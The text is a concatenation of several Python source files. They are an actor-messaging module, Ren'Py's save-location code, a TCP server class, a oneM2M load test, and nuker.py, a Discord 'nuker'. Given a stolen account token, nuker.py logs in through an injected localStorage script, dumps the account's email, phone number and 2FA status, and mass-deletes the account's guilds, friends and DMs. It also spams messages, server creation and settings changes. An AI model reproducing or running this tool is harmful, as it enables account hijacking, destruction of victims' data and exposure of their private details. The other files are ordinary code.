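        return self._done
    def send(self, *msgs: Any) -> NoReturn:
        # Broadcast to every connected inbox; MessageActor below shows a
        # receiver-addressed variant instead.
        for m in msgs:
            for inbox in self.outbox.values():
                inbox.put(m)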
class MessageActor(BaseActor):
    """A base actor with default logic for handling messages.
Attributes:
attrs: A mapping to maintain any mutable state.
"""
_EMPTY_ARGS = ()
_EMPTY_KWARGS = {}
__slots__ = ('attrs',)
def __init__(self, name: Optional[Hashable] = None):
super().__init__(name)
self.attrs: MutableMapping[Hashable, Any] = {}
def on_next(self, msg: Message) -> NoReturn:
"""Processes a message."""
pass
def should_stop(self) -> bool:
"""Returns True if the actor should terminate."""
pass
def run(self) -> NoReturn:
"""Initiates the actor."""
while not self.should_stop():
msg = self.receive()
if self.should_ignore(msg):
pass
elif msg.kind == MessageKind.DEFAULT:
self.on_next(msg)
elif msg.kind == MessageKind.CALL:
self.handle_call(msg)
elif msg.kind == MessageKind.RETURN:
self.handle_return(msg)
elif msg.kind == MessageKind.ACK:
self.handle_ack(msg)
elif msg.kind == MessageKind.SET:
self.handle_set(msg)
def handle_call(self, msg: Message) -> NoReturn:
"""Handle CALL Message."""
        # Prepare the method call and get its return value
data = msg.data
method = self.attrs[data['name']]
args = data.get('args', self._EMPTY_ARGS)
kwargs = data.get('kwargs', self._EMPTY_KWARGS)
return_data = method(*args, **kwargs)
        # Send a message with the returned value if requested
if msg.sender and data.get('return', True):
return_msg = Message(
return_data,
sender=self.name,
receiver=msg.sender,
kind=MessageKind.RETURN,
prev_id=msg.id)
self.send(return_msg)
def send(self, *msgs: Any) -> NoReturn:
"""Sends messages to other actors."""
for m in msgs:
self.outbox[m.receiver].put(m, block=True)
def handle_return(self, msg: Message) -> NoReturn:
"""Handle RETURN Message."""
pass
def handle_ack(self, msg: Message) -> NoReturn:
"""Handle ACK Message."""
pass
def handle_set(self, msg: Message) -> NoReturn:
"""Handle SET Message."""
data = msg.data
self.attrs[data['name']] = data['value']
def should_ignore(self, msg: Message) -> bool:
"""Returns True if the actor should ignore the received message."""
return False
class BaseActorSystem(BaseActor, ABC):
"""The root-level actor that manages a collection of actors.
Attributes:
actors: A sequence of actors that the system manages.
"""
__slots__ = ('actors', '_actors')
def __init__(
self,
name: Optional[Hashable] = None,
inbox: Optional[Any] = None):
super().__init__(name, inbox)
self.actors: MutableSequence[BaseActor] = []
self._actors: MutableMapping[Hashable, Process] = {}
def connect(self, *actors: 'BaseActor', complete: bool = True) -> NoReturn:
"""Fully connects all actors to each other and the system."""
super().connect(*actors)
self.actors.extend(actors)
self._actors.update((a.name, Process(target=a.run)) for a in actors)
for a in actors:
a.connect(self)
if complete:
self._make_complete(*actors)
@staticmethod
def _make_complete(*actors: 'BaseActor') -> NoReturn:
for a1, a2 in itertools.combinations(actors, r=2):
a1.connect(a2)
a2.connect(a1)
def run(self) -> NoReturn:
"""Initiates all actor processes and waits for their termination."""
for a in self._actors.values():
a.start()
super().run()
for a in self._actors.values():
a.join()
def on_next(self, msg: Any) -> NoReturn:
# No-op
pass
def should_stop(self) -> bool:
# No-op
return True
class MessageActorSystem(MessageActor, ABC):
"""An actor system that runs as a MessageActor."""
__slots__ = ('actors', '_actors')
def __init__(
self,
name: Optional[Hashable] = None):
super().__init__(name)
self.actors: MutableSequence[BaseActor] = []
self._actors: MutableMapping[Hashable, Process] = {}
def connect(self, *actors: 'MessageActor', complete: bool = True) -> NoReturn:
"""Fully connects all actors to each other and the system."""
super().connect(*actors)
self.actors.extend(actors)
self._actors.update((a.name, Process(target=a.run)) for a in actors)
for a in actors:
a.connect(self)
if complete:
self._make_complete(*actors)
@staticmethod
def _make_complete(*actors: 'MessageActor') -> NoReturn:
for a1, a2 in itertools.combinations(actors, r=2):
a1.connect(a2)
a2.connect(a1)
def run(self) -> NoReturn:
"""Initiates all actor processes and waits for their termination."""
for a in self._actors.values():
a.start()
super().run()
for a in self._actors.values():
a.join()
def on_next(self, msg: Any) -> NoReturn:
# No-op
pass
def should_stop(self) -> bool:
# No-op
return True
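# --- Illustrative sketch, not part of the original module ---
# Rough wiring of a MessageActor-based system. It assumes the Message
# constructor accepts the keyword arguments used in handle_call() above;
# the Doubler subclass and the 'done'/'double' names are hypothetical.
#
#   def double(x):
#       return 2 * x
#
#   class Doubler(MessageActor):
#       def should_stop(self):
#           return self.attrs.get('done', False)
#
#   system = MessageActorSystem()            # a concrete subclass in practice
#   worker = Doubler()
#   system.connect(worker)
#   # Store a callable under 'double', then invoke it remotely:
#   system.send(Message({'name': 'double', 'value': double},
#                       sender=system.name, receiver=worker.name,
#                       kind=MessageKind.SET))
#   system.send(Message({'name': 'double', 'args': (21,)},
#                       sender=system.name, receiver=worker.name,
#                       kind=MessageKind.CALL))
#   system.run()                             # starts the worker processes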
|
savelocation.py
|
# Copyright 2004-2018 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This contains code for the different save locations. A save location is a
# place where we store save data, and from which we can retrieve it.
#
# The current save location is stored in the location variable in loadsave.py.
from __future__ import print_function
import os
import zipfile
import json
import renpy.display
import threading
from renpy.loadsave import clear_slot, safe_rename
import shutil
disk_lock = threading.RLock()
# A suffix used to disambiguate temporary files being written by multiple
# processes.
import time
tmp = "." + str(int(time.time())) + ".tmp"
class FileLocation(object):
"""
A location that saves files to a directory on disk.
"""
def __init__(self, directory):
self.directory = directory
# Make the save directory.
try:
os.makedirs(self.directory)
except:
pass
# Try to write a test file.
try:
fn = os.path.join(self.directory, "text.txt")
with open(fn, "w") as f:
f.write("Test.")
os.unlink(fn)
self.active = True
except:
self.active = False
# A map from slotname to the mtime of that slot.
self.mtimes = { }
# The persistent file.
self.persistent = os.path.join(self.directory, "persistent")
# The mtime of the persistent file.
self.persistent_mtime = 0
# The data loaded from the persistent file.
self.persistent_data = None
def filename(self, slotname):
"""
Given a slot name, returns a filename.
"""
return os.path.join(self.directory, renpy.exports.fsencode(slotname + renpy.savegame_suffix))
def scan(self):
"""
Scan for files that are added or removed.
"""
if not self.active:
return
with disk_lock:
old_mtimes = self.mtimes
new_mtimes = { }
suffix = renpy.savegame_suffix
suffix_len = len(suffix)
for fn in os.listdir(self.directory):
if not fn.endswith(suffix):
continue
slotname = fn[:-suffix_len]
try:
new_mtimes[slotname] = os.path.getmtime(os.path.join(self.directory, fn))
except:
pass
self.mtimes = new_mtimes
for slotname, mtime in new_mtimes.iteritems():
if old_mtimes.get(slotname, None) != mtime:
clear_slot(slotname)
for slotname in old_mtimes:
if slotname not in new_mtimes:
clear_slot(slotname)
for pfn in [ self.persistent + ".new", self.persistent ]:
if os.path.exists(pfn):
mtime = os.path.getmtime(pfn)
if mtime != self.persistent_mtime:
data = renpy.persistent.load(pfn)
if data is not None:
self.persistent_mtime = mtime
self.persistent_data = data
break
def save(self, slotname, record):
"""
Saves the save record in slotname.
"""
filename = self.filename(slotname)
with disk_lock:
record.write_file(filename)
self.scan()
def list(self):
"""
Returns a list of all slots with savefiles in them, in arbitrary
order.
"""
return list(self.mtimes)
def mtime(self, slotname):
"""
For a slot, returns the time the object was saved in that
slot.
Returns None if the slot is empty.
"""
return self.mtimes.get(slotname, None)
def json(self, slotname):
"""
Returns the JSON data for slotname.
Returns None if the slot is empty.
"""
with disk_lock:
try:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
except:
return None
try:
try:
data = zf.read("json")
data = json.loads(data)
return data
except:
pass
try:
extra_info = zf.read("extra_info").decode("utf-8")
return { "_save_name" : extra_info }
except:
pass
return { }
finally:
zf.close()
def screenshot(self, slotname):
"""
Returns a displayable that show the screenshot for this slot.
Returns None if the slot is empty.
"""
with disk_lock:
mtime = self.mtime(slotname)
if mtime is None:
return None
try:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
except:
return None
try:
png = False
zf.getinfo('screenshot.tga')
except:
png = True
zf.getinfo('screenshot.png')
zf.close()
if png:
screenshot = renpy.display.im.ZipFileImage(filename, "screenshot.png", mtime)
else:
screenshot = renpy.display.im.ZipFileImage(filename, "screenshot.tga", mtime)
return screenshot
def load(self, slotname):
"""
Returns the log component of the file found in `slotname`, so it
can be loaded.
"""
with disk_lock:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
rv = zf.read("log")
zf.close()
return rv
def unlink(self, slotname):
"""
Deletes the file in slotname.
"""
with disk_lock:
filename = self.filename(slotname)
if os.path.exists(filename):
os.unlink(filename)
self.scan()
def rename(self, old, new):
"""
If old exists, renames it to new.
"""
with disk_lock:
old = self.filename(old)
new = self.filename(new)
if not os.path.exists(old):
return
if os.path.exists(new):
os.unlink(new)
os.rename(old, new)
self.scan()
def copy(self, old, new):
"""
Copies `old` to `new`, if `old` exists.
"""
with disk_lock:
old = self.filename(old)
new = self.filename(new)
if not os.path.exists(old):
return
shutil.copyfile(old, new)
self.scan()
def load_persistent(self):
"""
Returns a list of (mtime, persistent) tuples loaded from the
persistent file. This should return quickly, with the actual
        load occurring in the scan thread.
"""
if self.persistent_data:
return [ (self.persistent_mtime, self.persistent_data) ]
else:
return [ ]
def save_persistent(self, data):
"""
Saves `data` as the persistent data. Data is a binary string giving
the persistent data in python format.
"""
with disk_lock:
if not self.active:
return
fn = self.persistent
fn_tmp = fn + tmp
fn_new = fn + ".new"
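            # Write to a unique temporary file first, then promote it to
            # ".new" and finally to the real name, so a crash mid-write never
            # clobbers the last good persistent file.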
with open(fn_tmp, "wb") as f:
f.write(data)
safe_rename(fn_tmp, fn_new)
safe_rename(fn_new, fn)
def unlink_persistent(self):
if not self.active:
return
try:
os.unlink(self.persistent)
except:
pass
def __eq__(self, other):
if not isinstance(other, FileLocation):
return False
return self.directory == other.directory
class MultiLocation(object):
"""
A location that saves in multiple places. When loading or otherwise
accessing a file, it loads the newest file found for the given slotname.
"""
def __init__(self):
self.locations = [ ]
def active_locations(self):
return [ i for i in self.locations if i.active ]
def newest(self, slotname):
"""
Returns the location containing the slotname with the newest
        mtime. Returns None if the slot is empty.
"""
mtime = -1
location = None
for l in self.locations:
if not l.active:
continue
slot_mtime = l.mtime(slotname)
if slot_mtime > mtime:
mtime = slot_mtime
location = l
return location
def add(self, location):
"""
Adds a new location.
"""
if location in self.locations:
return
self.locations.append(location)
def save(self, slotname, record):
saved = False
for l in self.active_locations():
l.save(slotname, record)
saved = True
if not saved:
raise Exception("Not saved - no valid save locations.")
def list(self):
rv = set()
for l in self.active_locations():
rv.update(l.list())
return list(rv)
def mtime(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.mtime(slotname)
def json(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.json(slotname)
def screenshot(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.screenshot(slotname)
def load(self, slotname):
l = self.newest(slotname)
return l.load(slotname)
def unlink(self, slotname):
for l in self.active_locations():
l.unlink(slotname)
def rename(self, old, new):
for l in self.active_locations():
l.rename(old, new)
def copy(self, old, new):
for l in self.active_locations():
l.copy(old, new)
def load_persistent(self):
rv = [ ]
for l in self.active_locations():
rv.extend(l.load_persistent())
return rv
def save_persistent(self, data):
for l in self.active_locations():
l.save_persistent(data)
def unlink_persistent(self):
for l in self.active_locations():
l.unlink_persistent()
def scan(self):
# This should scan everything, as a scan can help decide if a
# location should become active or inactive.
for l in self.locations:
l.scan()
def __eq__(self, other):
if not isinstance(other, MultiLocation):
return False
return self.locations == other.locations
# The thread that scans locations every few seconds.
scan_thread = None
# True if we should quit the scan thread.
quit_scan_thread = False
# The condition we wait on.
scan_thread_condition = threading.Condition()
def run_scan_thread():
global quit_scan_thread
quit_scan_thread = False
while not quit_scan_thread:
try:
renpy.loadsave.location.scan() # @UndefinedVariable
except:
pass
with scan_thread_condition:
scan_thread_condition.wait(5.0)
def quit(): # @ReservedAssignment
global quit_scan_thread
with scan_thread_condition:
quit_scan_thread = True
scan_thread_condition.notifyAll()
scan_thread.join()
def init():
global scan_thread
location = MultiLocation()
# 1. User savedir.
location.add(FileLocation(renpy.config.savedir))
# 2. Game-local savedir.
if (not renpy.mobile) and (not renpy.macapp):
path = os.path.join(renpy.config.gamedir, "saves")
location.add(FileLocation(path))
# Scan the location once.
location.scan()
renpy.loadsave.location = location
scan_thread = threading.Thread(target=run_scan_thread)
scan_thread.start()
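# --- Illustrative note, not part of the original module ---
# run_scan_thread() above is a standard "stoppable poller": it loops on a quit
# flag and sleeps via Condition.wait(timeout) so quit() can cut the sleep short
# with notifyAll() instead of waiting out the full period. The same shape in a
# minimal standalone form, with hypothetical names:
#
#   stop = False
#   cond = threading.Condition()
#   def poller():
#       while not stop:
#           do_periodic_work()          # hypothetical
#           with cond:
#               cond.wait(5.0)
#   def shutdown():
#       global stop
#       with cond:
#           stop = True
#           cond.notify_all()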
|
nuker.py
|
### Made by: Azael
### Tweaked by: Vexvain
import threading, requests, discord, random, time, os
from colorama import Fore, init
from selenium import webdriver
from datetime import datetime
from itertools import cycle
init(convert=True)
guildsIds = []
friendsIds = []
channelIds = []
clear = lambda: os.system('cls')
clear()
class Login(discord.Client):
async def on_connect(self):
for g in self.guilds:
guildsIds.append(g.id)
for f in self.user.friends:
friendsIds.append(f.id)
for c in self.private_channels:
channelIds.append(c.id)
await self.logout()
def run(self, token):
try:
super().run(token, bot=False)
except Exception as e:
print(f"[{Fore.RED}-{Fore.RESET}] Invalid token", e)
input("Press any key to exit..."); exit(0)
def tokenLogin(token):
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome('chromedriver.exe', options=opts)
script = """
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
"""
driver.get("https://discord.com/login")
driver.execute_script(script + f'\nlogin("{token}")')
def tokenInfo(token):
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v6/users/@me', headers=headers)
if r.status_code == 200:
userName = r.json()['username'] + '#' + r.json()['discriminator']
userID = r.json()['id']
phone = r.json()['phone']
email = r.json()['email']
mfa = r.json()['mfa_enabled']
print(f'''
[{Fore.RED}User ID{Fore.RESET}] {userID}
[{Fore.RED}User Name{Fore.RESET}] {userName}
[{Fore.RED}2 Factor{Fore.RESET}] {mfa}
[{Fore.RED}Email{Fore.RESET}] {email}
[{Fore.RED}Phone number{Fore.RESET}] {phone if phone else ""}
[{Fore.RED}Token{Fore.RESET}] {token}
''')
input()
def tokenFuck(token):
headers = {'Authorization': token}
gdel = input(f'Would you like to delete all guilds on this account. y/n [No Capitals] > ')
fdel = input('Would you like to remove all friends on this account. y/n [No Capitals] > ')
sendall = input('Would you like to send a dm to all recent dms on this account. y/n [No Capitals] > ')
fremove = input('Would you like to remove all recent dms on this account. y/n [No Capitals] > ')
gleave = input('Would you like to leave all guilds on this account. y/n [No Capitals] > ')
gcreate = input('Would you like to spam create guilds on this account. y/n [No Capitals] > ')
dlmode = input('Would you like to spam change through light and dark mode. y/n [No Capitals] > ')
langspam = input('Would you like to spam change the user\'s language. y/n [No Capitals] > ')
print(f"[{Fore.RED}+{Fore.RESET}] Nuking...")
if sendall == 'y':
try:
sendmessage = input('What do you wish to send in dms? > ')
for id in channelIds:
requests.post(f'https://discord.com/api/v8/channels/{id}/messages', headers=headers, data={"content": f"{sendmessage}"})
print(f'Sent message to private channel ID of {id}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gleave == 'y':
try:
for guild in guildsIds:
requests.delete(f'https://discord.com/api/v8/users/@me/guilds/{guild}', headers=headers)
print(f'Left guild {guild}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if fdel == 'y':
try:
for friend in friendsIds:
requests.delete(f'https://discord.com/api/v8/users/@me/relationships/{friend}', headers=headers)
print(f'Removed friend {friend}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if fremove == 'y':
try:
for id in channelIds:
requests.delete(f'https://discord.com/api/v8/channels/{id}', headers=headers)
print(f'Removed private channel ID {id}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gdel == 'y':
try:
for guild in guildsIds:
requests.delete(f'https://discord.com/api/v8/guilds/{guild}', headers=headers)
print(f'Deleted guild {guild}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gcreate == 'y':
try:
gname = input('What would you like the spammed server name to be? > ')
gserv = input('How many servers would you like to make? [max is 100 by discord]')
for i in range(int(gserv)):
payload = {'name': f'{gname}', 'region': 'us central', 'icon': None, 'channels': None}
requests.post('https://discord.com/api/v6/guilds', headers=headers, json=payload)
print(f'Server {gname} made. Count: {i}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if dlmode == 'y':
try:
modes = cycle(["light", "dark"])
except Exception as e:
print(f'Error detected, ignoring. {e}')
if langspam == 'y':
try:
while True:
setting = {'theme': next(modes), 'locale': random.choice(['ja', 'zh-TW', 'ko', 'zh-CN', 'de', 'lt', 'lv', 'fi', 'se'])}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=headers, json=setting)
except Exception as e:
print(f'Error detected, ignoring. {e}')
time.sleep(9999)
def getBanner():
banner = f'''
[{Fore.RED}1{Fore.RESET}] Token bang the account
[{Fore.RED}2{Fore.RESET}] Grab the info of the account
[{Fore.RED}3{Fore.RESET}] Log into token
'''.replace('░', f'{Fore.RED}░{Fore.RESET}')
return banner
def startMenu():
print(getBanner())
print(f'[{Fore.RED}>{Fore.RESET}] Your choice', end=''); choice = str(input(' : '))
if choice == '1':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
print(f'[{Fore.RED}>{Fore.RESET}] Thread amount (number)', end=''); threads = input(' : ')
Login().run(token)
if threading.active_count() < int(threads):
t = threading.Thread(target=tokenFuck, args=(token, ))
t.start()
elif choice == '2':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
tokenInfo(token)
elif choice == '3':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
tokenLogin(token)
elif choice.isdigit() == False:
clear()
startMenu()
else:
clear()
startMenu()
if __name__ == '__main__':
startMenu()
|
TcpServer.py
|
#! /usr/bin/env python3
# -*- coding: UTF-8 -*-
import time
import traceback
import threading
import socket
from . import EventTypes, SocketError
from . import TcpClient
class TcpServer:
    """A TCP-based socket server.
    `host` : `tuple(ip, port)` -- the IPv4 address and port that accepts connections
"""
_host:tuple = None
_socket:socket.socket = None
_acceptThread:threading.Thread = None
_events:dict = {
EventTypes.STARTED: None,
EventTypes.STOPED: None,
EventTypes.CONNECTED: None,
EventTypes.DISCONNECT: None,
EventTypes.RECEIVED: None,
EventTypes.SENDED: None,
EventTypes.SENDFAIL: None
}
_stop:bool = False
_clients:dict = {}
_name:str = ''
def __init__(self, host:tuple):
self._host = host
self._name = '{}:{}'.format(*(host))
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Public Properties
@property
    def host(self) -> tuple:
        """Returns the local address and port this server listens on.
        Returns:
`tuple(ip, port)`
"""
return self._host
@property
    def isAlive(self) -> bool:
        """Whether the server is currently waiting for connections.
        Returns:
            `True` / `False`
            *True* : waiting for connections
            *False* : stopped waiting
"""
return self._acceptThread and self._acceptThread.isAlive()
@property
    def clients(self) -> dict:
        """Returns information about the connected clients.
        Returns:
`dictionary{ tuple(ip, port) : <TcpClient>, ... }`
"""
return self._clients.copy()
# Public Methods
    def start(self):
        """Starts the TcpServer and begins waiting for remote connections.
        Raises:
            `Exception` -- errors raised by the callback function
"""
try:
self._socket.bind(self._host)
except socket.error as ex:
if ex.errno == 48:
raise SocketError(1005)
else:
raise ex
self._socket.listen(5)
self._acceptThread = threading.Thread(target=self._accept_client)
self._acceptThread.setDaemon(True)
self._acceptThread.start()
now = time.time()
        while not self._acceptThread.isAlive() and (time.time() - now) <= 1:
time.sleep(0.1)
if self.isAlive and self._events[EventTypes.STARTED]:
self._events[EventTypes.STARTED](self)
    def stop(self):
        """Stops waiting for remote connections.
"""
self._stop = True
self.close()
self._socket.close()
self._socket = None
if self._acceptThread:
self._acceptThread.join(1.5)
    def bind(self, key:str, evt=None):
        """Binds a callback function to an event.
        Keyword arguments:
            `key` `str` -- the callback event code; to avoid errors, use an *EventTypes* enumeration value
            `evt` `def` -- the callback function
        Raises:
            `KeyError` -- unknown callback event code
            `TypeError` -- type error; `evt` must be a callable function
"""
if key not in self._events:
raise KeyError('key:\'{}\' not found!'.format(key))
if evt is not None and not callable(evt):
raise TypeError('evt:\'{}\' is not a function!'.format(evt))
self._events[key] = evt
    def send(self, data, remote=None):
        """Sends data to the remote end.
        Arguments:
            `data` `str` -- the data to send to the remote end
        Keyword arguments:
            `remote` `tuple(ip, port)` -- the remote connection to send to; if omitted, the data is sent to all connections
        Raises:
            `KeyError` -- the remote connection does not exist
            `TypeError` -- the remote connection does not exist
            `jfSocket.SocketError` -- the remote connection has been closed
            `Exception` -- any other error
"""
if remote:
if remote not in self._clients:
raise KeyError()
elif self._clients[remote] is None:
raise TypeError()
elif not self._clients[remote].isAlive:
raise SocketError(1001)
self._clients[remote].send(data)
else:
for x in self._clients:
self._clients[x].send(data)
    def close(self, remote=None):
        """Closes a remote connection.
        Keyword arguments:
            `remote` `tuple(ip, port)` -- the remote connection to close; if omitted, all connections are closed
"""
if remote is not None:
if remote not in self._clients:
return
            elif self._clients[remote] is None or not self._clients[remote].isAlive:
del self._clients[remote]
else:
self._clients[remote].close()
else:
            for x in list(self._clients):
if self._clients[x]:
self._clients[x].close()
del self._clients[x]
# Private Methods
def _onClientDisconnect(self, *args):
if self._clients[args[2]]:
del self._clients[args[2]]
if self._events[EventTypes.DISCONNECT]:
self._events[EventTypes.DISCONNECT](*(args))
def _accept_client(self):
        # Wait for connections in a non-blocking way, with a 1-second timeout
self._socket.settimeout(1)
while not self._stop:
try:
client, addr = self._socket.accept()
except socket.timeout:
                # Waiting for a connection timed out; keep waiting
continue
except:
# except (socket.error, IOError) as ex:
                # Catch and print for now; handle specific errors once we know which ones can occur
print(traceback.format_exc())
break
if self._stop:
try:
client.close()
except:
pass
break
clk = TcpClient.TcpClient(client)
clk.bind(key=EventTypes.RECEIVED, evt=self._events[EventTypes.RECEIVED])
clk.bind(key=EventTypes.DISCONNECT, evt=self._onClientDisconnect)
clk.bind(key=EventTypes.SENDED, evt=self._events[EventTypes.SENDED])
clk.bind(key=EventTypes.SENDFAIL, evt=self._events[EventTypes.SENDFAIL])
self._clients[addr] = clk
if self._events[EventTypes.CONNECTED] is not None:
self._events[EventTypes.CONNECTED](clk, self._host, addr)
if self._events[EventTypes.STOPED] is not None:
self._events[EventTypes.STOPED](self)
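# --- Illustrative sketch, not part of the original module ---
# Minimal usage of TcpServer; the host, port and handlers below are
# hypothetical. The CONNECTED callback signature follows _accept_client(),
# which invokes it as (client, local_host, remote_addr).
def _example_usage():
    def on_connected(client, host, remote):
        print('client connected from', remote)
    def on_received(*args):
        # The RECEIVED callback is forwarded to TcpClient, so its exact
        # signature depends on that class; accept anything here.
        print('received:', args)
    srv = TcpServer(('127.0.0.1', 5555))
    srv.bind(key=EventTypes.CONNECTED, evt=on_connected)
    srv.bind(key=EventTypes.RECEIVED, evt=on_received)
    srv.start()
    try:
        time.sleep(10)  # serve for a short while
    finally:
        srv.stop()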
|
testLoad.py
|
#
# testLoad.py
#
# (c) 2020 by Andreas Kraft
# License: BSD 3-Clause License. See the LICENSE file for further details.
#
# Load tests
#
from __future__ import annotations
import unittest, sys, time
sys.path.append('../acme')
from typing import Tuple
import threading
from Constants import Constants as C
from Types import ResponseCode as RC, ResourceTypes as T
from init import *
class TestLoad(unittest.TestCase):
aes:list[Tuple[str, str]] = []
timeStart:float = 0
def __init__(self, methodName:str='runTest', count:int=None, parallel:int=1):
""" Pass a count to the test cases.
"""
super(TestLoad, self).__init__(methodName)
self.count = count
self.parallel = parallel
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def setUpClass(cls) -> None:
pass
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def tearDownClass(cls) -> None:
for ae in cls.aes:
DELETE(f'{cseURL}/{ae[1]}', ORIGINATOR)
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def startTimer(cls) -> None:
""" Start a timer.
"""
cls.timeStart = time.perf_counter()
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def stopTimer(cls, count:int, parallel:int=1) -> str:
""" Stop a timer and return a meaningful result string.
        The count and parallel arguments must be given because this is a class method that has no access to these instance attributes.
"""
timeEnd = time.perf_counter()
total = (timeEnd - cls.timeStart)
return f'{total:.4f} ({total/(count*parallel):.5f})'
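    # Example of the result string (illustrative numbers): count=100,
    # parallel=10 and an elapsed time of 2.5 s yield '2.5000 (0.00250)',
    # i.e. total seconds followed by seconds per created resource.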
def _createAEs(self, count:int) -> list[Tuple[str, str]]:
""" Create n AEs and return the list of (identifiers, resourceName).
"""
aes:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:ae' : {
'api': 'NMyApp1Id',
'rr': False,
'srv': [ '3' ]
}}
r, rsc = CREATE(cseURL, 'C', T.AE, dct)
self.assertEqual(rsc, RC.created)
ri = findXPath(r, 'm2m:ae/ri')
rn = findXPath(r, 'm2m:ae/rn')
aes.append((ri, rn))
self.assertEqual(len(aes), count)
return aes
    def _deleteAEs(self, count:int, aes:list[Tuple[str, str]]=None) -> None:
        """ Delete n AEs. Remove the AEs from the given list (they are removed from the global list only if no list was given).
"""
if aes is None:
aes = TestLoad.aes
self.assertEqual(len(aes), count)
for ae in list(aes):
_, rsc = DELETE(f'{cseURL}/{ae[1]}', ORIGINATOR)
self.assertEqual(rsc, RC.deleted)
aes.remove(ae)
self.assertEqual(len(aes), 0)
def _createCNTs(self, aern:str, originator:str, count:int, mni:int) -> list[Tuple[str, str]]:
""" Create n CNTs and return the list of (identifiers, resourceName).
"""
cnts:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:cnt' : {
'mni': mni
}}
r, rsc = CREATE(f'{cseURL}/{aern}', originator, T.CNT, dct)
self.assertEqual(rsc, RC.created)
ri = findXPath(r, 'm2m:cnt/ri')
rn = findXPath(r, 'm2m:cnt/rn')
cnts.append((ri, rn))
self.assertEqual(len(cnts), count)
return cnts
def _createCINs(self, aern:str, cntrn:str, originator:str, count:int) -> list[Tuple[str, str]]:
""" Create n CINs and return the list of (identifiers, resourceName).
"""
cins:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:cin' : {
'con': 'Hello, world'
}}
r, rsc = CREATE(f'{cseURL}/{aern}/{cntrn}', originator, T.CIN, dct)
self.assertEqual(rsc, RC.created)
            ri = findXPath(r, 'm2m:cin/ri')
rn = findXPath(r, 'm2m:cin/rn')
cins.append((ri, rn))
self.assertEqual(len(cins), count)
return cins
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteAEs(self) -> None:
""" Delete n AEs. This might take a moment. """
TestLoad.startTimer()
print(f'{self.count} ... ', end='', flush=True)
self._deleteAEs(self.count)
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createAEs(self) -> None:
""" Create n AEs. This might take a moment. """
TestLoad.startTimer()
print(f'{self.count} ... ', end='', flush=True)
TestLoad.aes.extend(self._createAEs(self.count))
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createAEsParallel(self) -> None:
""" Create n AEs in m threads in parallel. This might take a moment. """
print(f'{self.count} * {self.parallel} Threads ... ', end='', flush=True)
threads = [threading.Thread(target=lambda: TestLoad.aes.extend(self._createAEs(self.count))) for _ in range(self.parallel)]
TestLoad.startTimer()
[t.start() for t in threads] # type: ignore [func-returns-value]
[t.join() for t in threads] # type: ignore [func-returns-value]
print(f'{TestLoad.stopTimer(self.count, self.parallel)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteAEsParallel(self) -> None:
""" Delete n AEs in m threads in parallel. This might take a moment. """
print(f'{self.count} * {self.parallel} Threads ... ', end='', flush=True)
nrPerList = int(len(TestLoad.aes)/self.parallel)
deleteLists = [TestLoad.aes[x:x+nrPerList] for x in range(0, len(TestLoad.aes), nrPerList)]
threads = [threading.Thread(target=lambda n: self._deleteAEs(self.count, aes=deleteLists[n]), args=(n,)) for n in range(self.parallel)]
TestLoad.startTimer()
[t.start() for t in threads] # type: ignore [func-returns-value]
[t.join() for t in threads] # type: ignore [func-returns-value]
print(f'{TestLoad.stopTimer(self.count, self.parallel)} ... ', end='', flush=True)
TestLoad.aes.clear()
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createCNTCINs(self) -> None:
""" Create 1 AE + n CNTs * 20 CINs. This might take a moment. """
self.assertEqual(len(TestLoad.aes), 0)
